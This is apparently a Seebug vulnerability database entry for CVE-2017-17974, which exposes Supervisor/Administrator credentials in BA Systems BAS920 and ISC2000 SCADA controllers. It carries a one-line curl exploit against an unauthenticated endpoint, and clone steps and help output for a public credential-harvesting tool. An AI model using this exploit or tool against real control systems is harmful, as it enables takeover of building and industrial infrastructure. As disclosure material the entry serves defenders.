CVE-2017-17974 - Unspecified vulnerability in Basystems Bas920 Firmware and Isc2000 Firmware

CVSS 9.8 - CRITICAL
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH

Summary

BA SYSTEMS BAS Web on BAS920 devices (with Firmware 01.01.00*, HTTPserv 00002, and Script 02.*) and ISC2000 devices allows remote attackers to obtain sensitive information via a request for isc/get_sid_js.aspx or isc/get_sid.aspx, as demonstrated by obtaining administrative access by subsequently using the credential information for the Supervisor/Administrator account.

Seebug

bulletinFamily: exploit
description:

# Exploit; SCADAS "BAS920 & ISC2000"; Credentials Exposed

## [BA System] “Improper Access Control (Authorization)”

[*] Exploit Title: "SCADAS "BAS920 & ISC2000"; Credentials Exposed”
[*] CVE: CVE-2017-17974
[*] Date: 29/12/2017
[*] Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) && Bertin Jose ( @bertinjoseb )
[*] Vendor: BA System
[*] devices(tested): BAS920 & ISC2000

Attacking SCADAs from the vendor “BA SYSTEM”:

![](https://images.seebug.org/1525932495921-w331s)

We access the platform and, as expected, we are greeted by a "login form":

![](https://images.seebug.org/1525932504009-w331s)

### Exploit:

```
curl http://<host>/isc/get_sid_js.aspx
```

### POCs:

![](https://images.seebug.org/1525932512672-w331s)

![](https://images.seebug.org/1525932520952-w331s)

### Inside:

![](https://images.seebug.org/1525932529413-w331s)

![](https://images.seebug.org/1525932536499-w331s)

***

# TOOL: "Plin Plan Plun" (ex - cafeina )

## Quick start

```
usr@pwn:~$ git clone https://github.com/ezelf/baCK_system.git
usr@pwn:~$ cd baCK_system
```

## help

```
usr@pwn:~/$ python plinplanplum.py --help
python plinplanplum.py --help
usage: plinplanplum.py [-h] [-v] --host HOST [--port PORT]

[+] Obtaining all credentials for the Supervisor/Administrator account

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit
  --host HOST    Host
  --port PORT    Port

[+] Demo: python plinplanplum.py --host 192.168.1.101 -p 81
```

***

## Usage:

![](https://images.seebug.org/1525932585891-w331s)

#### Last update !!!

![](https://images.seebug.org/1525932568749-w331s)

***

id: SSV:97286
last seen: 2018-06-26
modified: 2018-05-10
published: 2018-05-10
reporter: My Seebug
source: https://www.seebug.org/vuldb/ssvid-97286
title: SCADAS "BAS920 & ISC2000" Credentials Exposed(CVE-2017-17974)